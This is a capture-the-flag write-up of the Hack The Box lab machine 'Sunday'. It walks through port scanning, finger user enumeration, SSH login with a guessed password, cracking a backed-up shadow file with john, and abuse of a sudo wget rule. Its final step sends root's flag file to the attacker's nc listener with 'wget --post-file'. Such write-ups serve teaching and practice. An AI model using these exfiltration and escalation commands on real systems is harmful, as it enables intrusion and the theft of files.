Hack The Box - Sunday (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.
1
$ echo "10.10.10.76 sunday.htb" | sudo tee -a /etc/hosts
Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
$ rustscan --accessible -a sunday.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.76:111
Open 10.10.10.76:79
Open 10.10.10.76:22022
Open 10.10.10.76:46883
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-19 13:19 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Initiating Connect Scan at 13:19
Scanning sunday.htb (10.10.10.76) [4 ports]
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76
Discovered open port 46883/tcp on 10.10.10.76
Completed Connect Scan at 13:19, 0.01s elapsed (4 total ports)
Initiating Service scan at 13:19
Scanning 4 services on sunday.htb (10.10.10.76)
Completed Service scan at 13:19, 26.05s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.76.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:20, 11.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 1.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for sunday.htb (10.10.10.76)
Host is up, received user-set (0.0066s latency).
Scanned at 2021-01-19 13:19:26 UTC for 38s
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
22022/tcp open ssh syn-ack SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKQhj2N5gfwsseuHbx/yCXwOkphQCTzDyXaBw5SHg/vRBW9aYPsWUUV0XGZPlVtbhxFylTZGNZTWJyndzQL3aRcQNouwVH8NnQsT63s4uLKsAP3jx4afAwB7049PvisAxtDVMbqg94vxaJkh88VY/EMpASYNrLFtr1mZngrbAzOvAAAAFQCiLK6Oh21fvEjgZ0Yl0IRtONW/wwAAAIAxz1u+bPH+VE7upID2HEvYksXOItmohsDFt0oHmGMHf9TKwZvqQLZRix0eXYu8zLnTIdg7rVYSjGyRhuWeIkl1+0aIJL4/dzB+JthInTGFIngc83MtonLP4Sj3YL20wL9etVh8/M0ZOedntWrQcUW+8cUWZRlgW8q620HZKE8VqAAAAIB0s8wn1ufviVEKXct60uz2ZoduUgg07dfPfzvhpbw232KYUJ6lchTj2p2AV8cD0fk2lok2Qc6Kn/OKSjO9C0PlvG8WWkVVvlISUY4BEhtqtL3aof7PYp5nCrLK+2v+grCLxOvyYpT1OfDMQbahOWGZ9OCwQtQXKP1wYEQMqMsSRg==
| 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxAwq7HNZXHr7XEeYeKsbnaruPQyUK5IkSE/FxHesBaKQ37AsLjw8iacqUvcs8IuhPfiTtwuwU42zUHu1e1rmLpRlMyLQnjgJH1++fP5E0Qnxj4DrFr7aeRv1FqPkrnK/xCX46AdgUhs4+4YA04yfi8pOlaSEVucYaqWNhuqJkt8=
46883/tcp open unknown syn-ack
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds
Enumeration (1)
Port 79 Sun Solaris fingerd
The finger service allows us to see who is currently logged on.
1
2
$ finger @sunday.htb
No one logged on
No one is logged on. However we can use this tool to help us enumerate the usernames on the machine by bruteforcing with a give list of names.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t sunday.htb -m 100
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 100
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Tue Jan 19 09:52:40 2021 #########
access@sunday.htb: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@sunday.htb: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@sunday.htb: Login Name TTY Idle When Where..anne ???..marie ???..
bin@sunday.htb: bin ??? < . . . . >..
dee dee@sunday.htb: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@sunday.htb: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@sunday.htb: Login Name TTY Idle When Where..la ???..verne ???..
line@sunday.htb: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@sunday.htb: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@sunday.htb: Login Name TTY Idle When Where..miof ???..mela ???..
sammy@sunday.htb: sammy console <Jul 31 17:59>..
root@sunday.htb: root Super-User pts/3 <Apr 24, 2018> sunday ..
sunny@sunday.htb: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
zsa zsa@sunday.htb: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Tue Jan 19 09:54:14 2021 #########
14 results.
Usernames that do not have ???.. in their fields are legitimate usernames. Out of these, we were able to gather that admin, bin, line, message, sammy, sunny and root are real usernames, but only sammy, sunny and root had logons occuring on them so lets focus on them.
I would normally use hydra to brute-force their passwords, but it was so unstable I ended up manually guessing and got the password of sunny, which happens to be sunday. We then use this password to ssh into the machine.
1
2
3
4
5
6
$ ssh sunny@sunday.htb -p 22022
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)
Enumeration (2)
There was a folder at /backup containing 2 files.
1
2
3
4
5
6
sunny@sunday:~$ ls -al /backup
total 5
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2020-07-31 17:59 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
We were only able to read shadow.backup, but instead contained the password hashes of sammy and sunny!
1
2
3
4
sunny@sunday:~$ cat /backup/shadow.backup
...
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I then went on to crack the hash of sammy using john.
1
2
3
4
5
6
7
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
We can then su to sammy.
1
2
3
4
5
sunny@sunday:~$ su - sammy
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
user.txt
The user flag is in sammy’s home directory.
1
2
sammy@sunday:~$ cat Desktop/user.txt
a3d9XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Enumeration (3)
Checking sammy’s sudo rights, we see that he can run wget as root.
1
2
3
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
This means we could use wget to overwrite /etc/passwd or use wget to exfiltrate out files. This box was very unstable, so I decided to just stick with exfiltrating. (I am sorry for not following the standard of getting a shell but the instability of this machine was too much for me haha)
Exploitation / root.txt
We can start a nc listener
1
2
3
$ sudo rlwrap nc -lvnp 80
[sudo] password for kali:
listening on [any] 80 ...
And then use wget to send out the contents of the root flag in root’s home directory.
1
2
3
4
5
sammy@sunday:~$ sudo wget --post-file=/root/root.txt 10.10.XX.XX
--20:51:15-- http://10.10.XX.XX/
=> `index.html'
Connecting to 10.10.XX.XX:80... connected.
HTTP request sent, awaiting response...
Then on our listener, we get the root flag!
1
2
3
4
5
6
7
8
9
10
11
12
$ sudo rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.76] 46114
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.XX.XX
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Rooted ! Thank you for reading and look forward for more writeups and articles !
This post is licensed under CC BY 4.0 by the author.